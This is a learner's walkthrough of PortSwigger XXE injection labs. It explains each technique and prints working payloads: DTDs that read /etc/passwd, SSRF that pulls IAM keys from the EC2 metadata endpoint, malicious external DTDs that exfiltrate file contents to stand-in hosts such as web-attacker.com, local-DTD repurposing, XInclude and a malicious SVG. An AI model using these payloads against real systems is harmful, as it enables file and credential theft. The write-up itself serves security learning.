[Toc]

# What is XML external entity injection?

XML external entity injection (also known as XXE) allows an attacker to interfere with an application's processing of XML data. It often allows an attacker to view files on the application server filesystem, and to interact with any back-end or external systems that the application itself can access.

# What are the types of XXE attacks?

There are various types of XXE attacks:

- **XXE to retrieve files**, where an external entity is defined containing the contents of a file, and returned in the application's response
- **XXE to perform SSRF attacks**, where an external entity is defined based on a URL to a back-end system
- **Blind XXE to exfiltrate data out-of-band**, where sensitive data is transmitted from the application server to a system that the attacker controls
- **Blind XXE to retrieve data via error messages**, where the attacker can trigger a parsing error message containing sensitive data

# Exploiting XXE to retrieve files

To perform an XXE injection attack that retrieves an arbitrary file from the server's filesystem, you need to modify the submitted XML in two ways:

- Introduce (or edit) a `DOCTYPE` element that defines an external entity containing the path of the file
- Edit a data value in the XML that is returned in the application's response, to make use of the defined external entity

For example, suppose a shopping application checks for the stock level of a product by submitting the following XML to the server:

```xml=
<?xml version="1.0" encoding="UTF-8"?>
<stockCheck><productId>381</productId></stockCheck>
```

The application performs no particular defenses against XXE attacks, so you can exploit the XXE vulnerability to retrieve the `/etc/passwd` file by submitting the following XXE payload:

```xml=
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>
```

This XXE payload defines an external entity
`&xxe;` whose value is the contents of the `/etc/passwd` file and uses the entity within the `productId` value. This causes the application's response to include the contents of the file:

```
Invalid product ID: root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...
```

### APPRENTICE Lab: Exploiting XXE using external entities to retrieve files

The `Check stock` function sends an XML document to the server:

![image](https://hackmd.io/_uploads/Bk25_bc5T.png)

Send the request to Repeater, add this payload after the XML declaration, and use `&xxe;` as the `productId` value:

```
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
```

![image](https://hackmd.io/_uploads/HJyQCZcqa.png)

![image](https://hackmd.io/_uploads/rJKB0-qqp.png)

:::success
**Solve** :+1:
:::

# Exploiting XXE to perform SSRF attacks

Aside from retrieval of sensitive data, the other main impact of XXE attacks is that they can be used to perform SSRF. This is a potentially serious vulnerability in which the server-side application can be induced to make HTTP requests to any URL that the server can access.

To exploit an XXE vulnerability to perform an SSRF attack, you need to define an external XML entity using the URL that you want to target, and use the defined entity within a data value. If you can use the defined entity within a data value that is returned in the application's response, then you will be able to view the response from the URL within the application's response.

In the following XXE example, the external entity will cause the server to make a back-end HTTP request to an internal system within the organization's infrastructure:

```
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://internal.vulnerable-website.com/"> ]>
```

### APPRENTICE Lab: Exploiting XXE to perform SSRF attacks

This lab has a "Check stock" feature that parses XML input.
![image](https://hackmd.io/_uploads/ryCSmz5qa.png)

The lab server is running a (simulated) EC2 metadata endpoint at the default URL, which is `http://169.254.169.254/`. This endpoint can be used to retrieve data about the instance, some of which might be sensitive.

![image](https://hackmd.io/_uploads/HJOkBz95T.png)

It seems to be vulnerable to SSRF. To solve the lab, obtain the server's IAM secret access key from the EC2 metadata endpoint.

At this step I was not really sure how the EC2 metadata endpoint works, so I kept querying whatever path the previous response returned, like this:

![image](https://hackmd.io/_uploads/BkILLGcc6.png)

Continue with `meta-data`:

![image](https://hackmd.io/_uploads/SyucIz5cp.png)

Keep going like that until we reach the sensitive data:

![image](https://hackmd.io/_uploads/ry_RLGc9T.png)

![image](https://hackmd.io/_uploads/SJWePz9ca.png)

:::success
**Solve** :+1:
:::

# Blind XXE

## Detecting blind XXE using OAST techniques

You can often detect blind XXE using the same technique as for XXE SSRF attacks, but triggering the out-of-band network interaction to a system that you control. For example, you would define an external entity as follows:

```
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://f2g9j7hhkax.web-attacker.com"> ]>
```

You would then make use of the defined entity in a data value within the XML.

This XXE attack causes the server to make a back-end HTTP request to the specified URL. The attacker can monitor for the resulting DNS lookup and HTTP request, and thereby detect that the XXE attack was successful.

### PRACTITIONER Lab: Blind XXE with out-of-band interaction

This lab has a "Check stock" feature that parses XML input but does not display the result.
![image](https://hackmd.io/_uploads/Bkb_hf5qT.png)

But by triggering out-of-band interactions with an external domain, we can make the XML parser issue a DNS lookup and HTTP request to Burp Collaborator:

![image](https://hackmd.io/_uploads/ByJke7ccp.png)

![image](https://hackmd.io/_uploads/HJxzGQc5a.png)

:::success
**Solve** :+1:
:::

### PRACTITIONER Lab: Blind XXE with out-of-band interaction via XML parameter entities

Sometimes, XXE attacks using regular entities are blocked, due to some input validation by the application or some hardening of the XML parser that is being used. In this situation, you might be able to use XML parameter entities instead. XML parameter entities are a special kind of XML entity which can only be referenced elsewhere within the DTD. For present purposes, you only need to know two things. First, the declaration of an XML parameter entity includes the percent character before the entity name:

```xml=
<!ENTITY % myparameterentity "my parameter entity value" >
```

And second, parameter entities are referenced using the percent character instead of the usual ampersand:

```
%myparameterentity;
```

This means that you can test for blind XXE using out-of-band detection via XML parameter entities as follows:

```xml=
<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://f2g9j7hhkax.web-attacker.com"> %xxe; ]>
```

This XXE payload declares an XML parameter entity called `xxe` and then uses the entity within the DTD. This will cause a DNS lookup and HTTP request to the attacker's domain, verifying that the attack was successful.

This lab has a "Check stock" feature that parses XML input.
![image](https://hackmd.io/_uploads/S1sSQ4ssa.png)

But it does not display any unexpected values, and it blocks requests containing regular external entities.

Try using an XML parameter entity:

![image](https://hackmd.io/_uploads/SkqVIEis6.png)

This causes a DNS lookup and HTTP request to our domain:

![image](https://hackmd.io/_uploads/Hkv_8Esia.png)

![image](https://hackmd.io/_uploads/SJIG_Nsi6.png)

:::success
**Solve** :+1:
:::

## Exploiting blind XXE to exfiltrate data out-of-band

Detecting a blind XXE vulnerability via out-of-band techniques is all very well, but it doesn't actually demonstrate how the vulnerability could be exploited. What an attacker really wants to achieve is to exfiltrate sensitive data. This can be achieved via a blind XXE vulnerability, but it involves the attacker hosting a malicious DTD on a system that they control, and then invoking the external DTD from within the in-band XXE payload.

**What is a DTD**

A DTD is a Document Type Definition. It defines the structure and the legal elements and attributes of an XML document.

**Why use a DTD**

With a DTD, independent groups of people can agree on a standard DTD for interchanging data.
An application can use a DTD to verify that XML data is valid.

**An internal DTD declaration**

If the DTD is declared inside the XML file, it must be wrapped inside the `<!DOCTYPE>` definition:

**XML document with an internal DTD**

```xml=
<?xml version="1.0"?>
<!DOCTYPE note [
<!ELEMENT note (to,from,heading,body)>
<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT heading (#PCDATA)>
<!ELEMENT body (#PCDATA)>
]>
<note>
<to>Tove</to>
<from>Jani</from>
<heading>Reminder</heading>
<body>Don't forget me this weekend</body>
</note>
```

The DTD above is interpreted like this:

- `!DOCTYPE note` defines that the root element of this document is `note`
- `!ELEMENT note` defines that the `note` element must contain four elements: "to, from, heading, body"
- `!ELEMENT to` defines the `to` element to be of type "#PCDATA", and the same goes for `!ELEMENT from`, `heading`, and `body`

And this is how the XML file looks:

![image](https://hackmd.io/_uploads/B1-I9-osT.png)

**An example of a malicious DTD to exfiltrate the contents of the `/etc/passwd` file is as follows:**

```xml=!
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://web-attacker.com/?x=%file;'>">
%eval;
%exfiltrate;
```

This DTD carries out the following steps:

- Defines an XML parameter entity called `file`, containing the contents of the `/etc/passwd` file
- Defines an XML parameter entity called `eval`, containing a dynamic declaration of another XML parameter entity called `exfiltrate`. The `exfiltrate` entity will be evaluated by making an HTTP request to the attacker's web server containing the value of the `file` entity within the URL query string
- Uses the `eval` entity, which causes the dynamic declaration of the `exfiltrate` entity to be performed
- Uses the `exfiltrate` entity, so that its value is evaluated by requesting the specified URL

The attacker must then host the malicious DTD on a system that they control, normally by loading it onto their own web server.
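
As an aside on the `eval` declaration in the DTD above: `&#x25;` is the character reference for `%`. A literal `%` is not allowed at that position, because inside an entity value the parser treats `%` as the start of a parameter entity reference. The nested declaration is therefore written in escaped form and only turns into a real `<!ENTITY % ...>` declaration once the `eval` value has been processed. The Python sketch below imitates only that one expansion step with a regular expression. `expand_char_refs` is a hypothetical helper written for this note, not part of any XML library, and a real parser does considerably more.

```python
import re


def expand_char_refs(text: str) -> str:
    """Expand hexadecimal character references such as &#x25; in a single pass."""
    return re.sub(
        r"&#x([0-9A-Fa-f]+);",
        lambda match: chr(int(match.group(1), 16)),
        text,
    )


# Literal value of the `eval` entity, copied from the DTD above.
eval_literal = "<!ENTITY &#x25; exfiltrate SYSTEM 'http://web-attacker.com/?x=%file;'>"

# After expansion the text is an ordinary parameter entity declaration.
# A real parser would also substitute %file; with the file contents at this point;
# this sketch deliberately leaves it untouched.
expanded = expand_char_refs(eval_literal)
print(expanded)
```

None of this changes the hosting step: the DTD still has to be reachable from the target server.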
For example, the attacker might serve the malicious DTD at the following URL:

```
http://web-attacker.com/malicious.dtd
```

Finally, the attacker must submit the following XXE payload to the vulnerable application:

```
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://web-attacker.com/malicious.dtd"> %xxe;]>
```

This XXE payload declares an XML parameter entity called `xxe` and then uses the entity within the DTD. This will cause the XML parser to fetch the external DTD from the attacker's server and interpret it inline. The steps defined within the malicious DTD are then executed, and the `/etc/passwd` file is transmitted to the attacker's server.

### PRACTITIONER Lab: Exploiting blind XXE to exfiltrate data using a malicious external DTD

This lab has a "Check stock" feature that parses XML input but does not display the result. So we can check for blind XXE using this request:

![image](https://hackmd.io/_uploads/Sk6-fSoia.png)

Check the Collaborator tab for the result:

![image](https://hackmd.io/_uploads/S1c7MHiiT.png)

Now place the Burp Collaborator payload into a malicious DTD file:

```xml=
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'https://e3i7wzpk768tf6x8riqwd56cs3yumpae.oastify.com/?x=%file;'>">
%eval;
%exfil;
```

Click "Go to exploit server" and save the malicious DTD file on your server.

![image](https://hackmd.io/_uploads/rk6wmrsia.png)

Click "View exploit" and take a note of the URL.

![image](https://hackmd.io/_uploads/S1BtmSisp.png)

Exploit the stock checker feature by adding a parameter entity referring to the malicious DTD.
Insert the following external entity definition in between the XML declaration and the `stockCheck` element:

```
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "YOUR-DTD-URL"> %xxe;]>
```

![image](https://hackmd.io/_uploads/Hyoi4Sso6.png)

Go back to the Collaborator tab, and click "Poll now" to see the interactions:

![image](https://hackmd.io/_uploads/SyMZHSisa.png)

You should see some DNS and HTTP interactions that were initiated by the application as the result of your payload. The HTTP interaction could contain the contents of the `/etc/hostname` file:

![image](https://hackmd.io/_uploads/rJxjrrsia.png)

Submit the answer:

![image](https://hackmd.io/_uploads/Sk2pBHjja.png)

:::success
**Solve** :+1:
:::

## Exploiting blind XXE to retrieve data via error messages

An alternative approach to exploiting blind XXE is to trigger an XML parsing error where the error message contains the sensitive data that you wish to retrieve. This will be effective if the application returns the resulting error message within its response.

You can trigger an XML parsing error message containing the contents of the `/etc/passwd` file using a malicious external DTD as follows:

```
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
```

This DTD carries out the following steps:

- Defines an XML parameter entity called `file`, containing the contents of the `/etc/passwd` file.
- Defines an XML parameter entity called `eval`, containing a dynamic declaration of another XML parameter entity called `error`. The `error` entity will be evaluated by loading a nonexistent file whose name contains the value of the `file` entity.
- Uses the `eval` entity, which causes the dynamic declaration of the `error` entity to be performed.
- Uses the `error` entity, so that its value is evaluated by attempting to load the nonexistent file, resulting in an error message containing the name of the nonexistent file, which is the contents of the `/etc/passwd` file.

### PRACTITIONER Lab: Exploiting blind XXE to retrieve data via error messages

This lab has a "Check stock" feature that parses XML input but does not display the result. So we can check for blind XXE using this request:

![image](https://hackmd.io/_uploads/BJr5rq-2a.png)

Then we can see some interactions in the Collaborator tab:

![image](https://hackmd.io/_uploads/SJQJ85Z3a.png)

We can trigger an XML parsing error message containing the contents of the `/etc/passwd` file using this malicious DTD:

```
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
```

Click "Go to exploit server" and save the malicious DTD file on your server. Click "View exploit" and take a note of the URL.

![image](https://hackmd.io/_uploads/ryhWt5-na.png)

Invoking the malicious external DTD will result in an error message:

![image](https://hackmd.io/_uploads/ryeOF5W3T.png)

![image](https://hackmd.io/_uploads/SJW5F9W2T.png)

:::success
**Solve** :+1:
:::

## Exploiting blind XXE by repurposing a local DTD

The preceding technique works fine with an external DTD, but it won't normally work with an internal DTD that is fully specified within the `DOCTYPE` element. This is because the technique involves using an XML parameter entity within the definition of another parameter entity. Per the XML specification, this is permitted in external DTDs but not in internal DTDs.

So what about blind XXE vulnerabilities when out-of-band interactions are blocked? You can't exfiltrate data via an out-of-band connection, and you can't load an external DTD from a remote server.
In this situation, it might still be possible to trigger error messages containing sensitive data, due to a loophole in the XML language specification. If a document's DTD uses a hybrid of internal and external DTD declarations, then the **internal DTD can redefine entities that are declared in the external DTD**. When this happens, the restriction on using an XML parameter entity within the definition of another parameter entity is relaxed.

This means that an attacker can employ the error-based XXE technique from within an internal DTD, provided the XML parameter entity that they use is redefining an entity that is declared within an external DTD. Of course, if out-of-band connections are blocked, then the external DTD cannot be loaded from a remote location. Instead, it needs to be an external DTD file that is local to the application server. Essentially, the attack involves **invoking a DTD file that happens to exist on the local filesystem** and repurposing it to redefine an existing entity in a way that triggers a parsing error containing sensitive data.

For example, suppose there is a DTD file on the server filesystem at the location `/usr/local/app/schema.dtd`, and this DTD file defines an entity called `custom_entity`. An attacker can trigger an XML parsing error message containing the contents of the `/etc/passwd` file by submitting a hybrid DTD like the following:

```xml=
<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///usr/local/app/schema.dtd">
<!ENTITY % custom_entity '
<!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
'>
%local_dtd;
]>
```

This DTD carries out the following steps:

- Defines an XML parameter entity called `local_dtd`, containing the contents of the external DTD file that exists on the server filesystem
- Redefines the XML parameter entity called `custom_entity`, which is already defined in the external DTD file.
  The entity is redefined as containing the error-based XXE exploit that was already described, for triggering an error message containing the contents of the `/etc/passwd` file
- Uses the `local_dtd` entity, so that the external DTD is interpreted, including the redefined value of the `custom_entity` entity. This results in the desired error message.

### Locating an existing DTD file to repurpose

Since this XXE attack involves repurposing an existing DTD on the server filesystem, a key requirement is to locate a suitable file. This is actually quite straightforward. Because the application returns any error messages thrown by the XML parser, you can easily enumerate local DTD files just by attempting to load them from within the internal DTD.

For example, Linux systems using the GNOME desktop environment often have a DTD file at `/usr/share/yelp/dtd/docbookx.dtd`. You can test whether this file is present by submitting the following XXE payload, which will **cause an error if the file is missing**:

```xml
<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
%local_dtd;
]>
```

After you have tested a list of common DTD files to locate a file that is present, you then need to obtain a copy of the file and review it to find an entity that you can redefine. Since many common systems that include DTD files are open source, you can normally obtain a copy of the files quickly through an internet search.

### EXPERT Lab: Exploiting XXE to retrieve data by repurposing a local DTD

This lab has a "Check stock" feature that parses XML input but does not display the result.

1. Visit a product page, click "Check stock", and intercept the resulting POST request in Burp Suite.

   ![image](https://hackmd.io/_uploads/SyiJkO23T.png)

2. Insert the following parameter entity definition in between the XML declaration and the `stockCheck` element:

   ```
   <!DOCTYPE message [
   <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
   <!ENTITY % ISOamso '
   <!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
   <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
   &#x25;eval;
   &#x25;error;
   '>
   %local_dtd;
   ]>
   ```

   This will import the Yelp DTD, then redefine the `ISOamso` entity, triggering an error message containing the contents of the `/etc/passwd` file.

Result:

![image](https://hackmd.io/_uploads/B1sngdn3T.png)

:::success
**Solve** :+1:
:::

# Finding hidden attack surface for XXE injection

Attack surface for XXE injection vulnerabilities is obvious in many cases, because the application's normal HTTP traffic includes requests that contain data in XML format. In other cases, the attack surface is less visible. However, if you look in the right places, you will find XXE attack surface in requests that do not contain any XML.

## XInclude attacks

Some applications receive client-submitted data, embed it on the server-side into an XML document, and then parse the document. An example of this occurs when client-submitted data is placed into a back-end SOAP request, which is then processed by the backend SOAP service.

In this situation, you cannot carry out a classic XXE attack, because you don't control the entire XML document and so cannot define or modify a `DOCTYPE` element. However, you might be able to use `XInclude` instead. `XInclude` is a part of the XML specification that allows an XML document to be built from sub-documents. You can place an `XInclude` attack within any data value in an XML document, so the attack can be performed in situations where you only control a single item of data that is placed into a server-side XML document.
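
To make that constraint concrete, here is a minimal Python sketch of the kind of server-side code described above. The template, the `build_backend_request` name, and the element layout are all assumptions invented for illustration; no real application is being quoted. It shows that the client-submitted value lands inside an element deep in the document, well after the prolog where a `DOCTYPE` would have to appear.

```python
# Hypothetical back-end template: the server owns the prolog and the envelope,
# and the client only supplies the text placed inside <productId>.
SOAP_TEMPLATE = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">'
    "<soap:Body><stockCheck><productId>{product_id}</productId></stockCheck></soap:Body>"
    "</soap:Envelope>"
)


def build_backend_request(product_id: str) -> str:
    """Embed a client-submitted value into the server-side document without escaping."""
    return SOAP_TEMPLATE.format(product_id=product_id)


document = build_backend_request("381")
print(document)

# The submitted value appears after the root element has already started,
# so the client has no way to add or change a DOCTYPE in the prolog.
print(document.index("381") > document.index("<soap:Envelope"))
```

Because the value is inserted as-is, any markup the client sends becomes part of the document body, which is exactly the position where an `XInclude` element can be placed.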
To perform an `XInclude` attack, you need to reference the `XInclude` namespace and provide the path to the file that you wish to include. For example:

```
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>
```

### PRACTITIONER Lab: Exploiting XInclude to retrieve files

After walking around the website, I can see that it does not send any XML document, not even in the `Check stock` function:

![image](https://hackmd.io/_uploads/rJuZ_OT3p.png)

But I want to use the `Content Type Converter` extension in Burp to check whether the server can process JSON:

![image](https://hackmd.io/_uploads/BJxi_Op26.png)

And it does not accept JSON:

![image](https://hackmd.io/_uploads/HkrHtuT2p.png)

:::warning
If the API accepts JSON or other content, change it to XML. If the expected response is returned, it's parsing XML, so XXE time!
:::

So after testing that, we can also try something like `&entity`:

![image](https://hackmd.io/_uploads/SklPj_T3p.png)

This error shows that the application is actually parsing whatever we input as XML.

Now that we know it's parsing XML, let's try XInclude:

![image](https://hackmd.io/_uploads/B1o_2d626.png)

And bingo, we solved the lab:

![image](https://hackmd.io/_uploads/Hync2uTha.png)

:::success
**Solve** :+1:
:::

## XXE attacks via file upload

Some applications allow users to upload files which are then processed server-side. Some common file formats use XML or contain XML subcomponents. Examples of XML-based formats are office document formats like DOCX and image formats like SVG.

For example, an application might allow users to upload images, and process or validate these on the server after they are uploaded. Even if the application expects to receive a format like PNG or JPEG, the image processing library that is being used might support SVG images. Since the SVG format uses XML, an attacker can submit a malicious SVG image and so reach hidden attack surface for XXE vulnerabilities.
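
One way to picture why the expected image type is not a reliable boundary: a processing library may choose its decoder from the file's leading bytes rather than from the file name or the declared content type. The Python sketch below is a hypothetical content sniffer. The `sniff_upload` name and its return labels are invented here, and real image libraries use their own detection logic, so treat it only as an illustration of the idea.

```python
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"  # 8-byte PNG signature
JPEG_MAGIC = b"\xff\xd8\xff"      # start of a JPEG stream


def sniff_upload(data: bytes) -> str:
    """Guess the real format of an upload from its first bytes, ignoring the file name."""
    if data.startswith(PNG_MAGIC):
        return "png"
    if data.startswith(JPEG_MAGIC):
        return "jpeg"
    head = data[:256].lstrip().lower()
    if head.startswith(b"<?xml") or head.startswith(b"<svg"):
        return "xml-based (possibly svg)"
    return "unknown"


# A file named avatar.png can still carry XML content.
print(sniff_upload(PNG_MAGIC + b"\x00" * 8))
print(sniff_upload(b'<?xml version="1.0"?><svg xmlns="http://www.w3.org/2000/svg"/>'))
```

If the second kind of file reaches an XML parser that resolves external entities, the upload feature becomes an XXE entry point even though no request in the application visibly carries XML.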
### PRACTITIONER Lab: Exploiting XXE via image file upload

This website has a function to upload images, and we can upload an SVG file like this:

![image](https://hackmd.io/_uploads/rkBFroT26.png)

Since the SVG format uses XML, we can change the content of the SVG file like this:

```xml=
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<text font-size="16" x="0" y="16"> &xxe; </text>
</svg>
```

Remember not to leave any blank space before the very first line of the file, or you will get an error like this:

![image](https://hackmd.io/_uploads/BJK0q2636.png)

You can see there is a blank line at line 39. Delete this line and you can upload the file:

![image](https://hackmd.io/_uploads/SJP-i3ahT.png)

Next, reload the website and access the file you just uploaded:

![image](https://hackmd.io/_uploads/rJ7Nj3a3p.png)

You can see that the SVG file was processed by the server and rendered into a new PNG file. This file contains the content we asked for in the XML payload, which is the host name.

Submit the answer and solve the lab:

![image](https://hackmd.io/_uploads/r1-ao2ThT.png)

:::success
**Solve** :+1:
:::
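
The blank-line error in this lab can be reproduced locally. XML requires the `<?xml ...?>` declaration, when present, to sit at the very start of the document, so even one newline before it makes the file ill-formed. The sketch below uses Python's standard `xml.etree.ElementTree` as a stand-in. The lab server's actual parser is unknown, so its error text will differ, and the `is_well_formed` helper and the sample strings are made up for this check.

```python
import xml.etree.ElementTree as ET

# A harmless SVG with no entities, used only to test the declaration position.
GOOD = '<?xml version="1.0"?><svg xmlns="http://www.w3.org/2000/svg"/>'
BAD = "\n" + GOOD  # one blank line before the XML declaration


def is_well_formed(text: str) -> bool:
    """Return True if the standard-library parser accepts the document."""
    try:
        ET.fromstring(text)
        return True
    except ET.ParseError as exc:
        print("parse error:", exc)
        return False


print(is_well_formed(GOOD))
print(is_well_formed(BAD))
```

Running a quick check like this before uploading saves a round trip when the payload file has been edited by hand.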